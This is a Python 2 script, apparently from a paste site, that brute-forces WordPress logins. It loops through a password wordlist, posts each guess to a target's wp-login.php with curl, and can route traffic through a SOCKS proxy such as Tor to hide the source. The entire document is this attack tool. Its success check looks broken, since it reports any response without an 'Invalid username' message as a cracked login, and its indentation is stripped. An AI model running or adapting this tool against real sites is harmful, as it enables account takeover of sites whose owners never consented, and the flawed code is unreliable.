Brute WP

1. import os,sys,time,urllib2
2. os.system("rm wpbrute_output.html")
3. os.system("rm dir_list.txt")
4. os.system("clear")
5.  
6. try:
7. target = sys.argv[1]
8. username = sys.argv[2]
9. wlist = sys.argv[3]
10.  
11. except:
12. time.sleep(0.6)
13. print "+_________________________________________+"
14. print "| Wordpress Login Brute Forcer |"
15. print "| Jack HaXOr |"
16. print "+_________________________________________+\n"
17. time.sleep(1)
18. print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
19. print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
20. print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
21. sys.exit(1)
22.  
23. try:
24. proxy = sys.argv[4]
25. except:
26. proxy = "no"
27.  
28. if "http://" not in target:
29. target = "http://%s" %target
30.  
31. print "+_________________________________________+"
32. print "| Wordpress Login Brute Forcer |"
33. print "| Jack HaXOr |"
34. print "+_________________________________________+"
35. time.sleep(1)
36. print "\n ... Calculating number of words in '%s' ... " %wlist
37. time.sleep(1.3)
38.  
39. words = open(sys.argv[3],"r").readlines()
40.  
41. time.sleep(0.8)
42.  
43. print "\n [+] Words loaded => ", len(words)
44. time.sleep(1.3)
45.  
46. if proxy != "no":
47. print " [+] Proxy loaded => '%s'\n" %proxy
48.  
49. else:
50. print "\n"
51.  
52. time.sleep(1.1)
53. print " ... Bruteforcing Wordpress login ... \n"
54. time.sleep(1.5)
55.  
56.  
57. for word in words:
58. word = word.replace('\r','').replace('\n','')
59.  
60.  
61. print ".. Trying => '%s:%s' " %(username,word)
62.  
63. if proxy != "no":
64. curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)
65.  
66. else:
67. curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)
68.  
69. ls = "ls -l > dir_list.txt"
70.  
71. os.system(curl)
72. os.system(ls)
73.  
74. cfile = open("dir_list.txt","r")
75. cfile_read = cfile.read()
76. cfile.close()
77.  
78. if "wpbrute_output.html" in cfile_read:
79. #print "\n_________________________________________"
80. #print ".. Login not bruteforced :( "
81. ofile = open("wpbrute_output.html","r")
82. ofile_read = ofile.read()
83. ofile.close()
84. os.system("rm wpbrute_output.html")
85.  
86. if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
87. print ".. Invalid username!\n"
88. sys.exit(1)
89. #print "________________________________________\n"
90.  
91. else:
92. print "\n__________________________________________________________"
93. print "..+ Login bruteforced --> '%s:%s'" %(username,word)
94. print "__________________________________________________________\n"
95. sys.exit(1)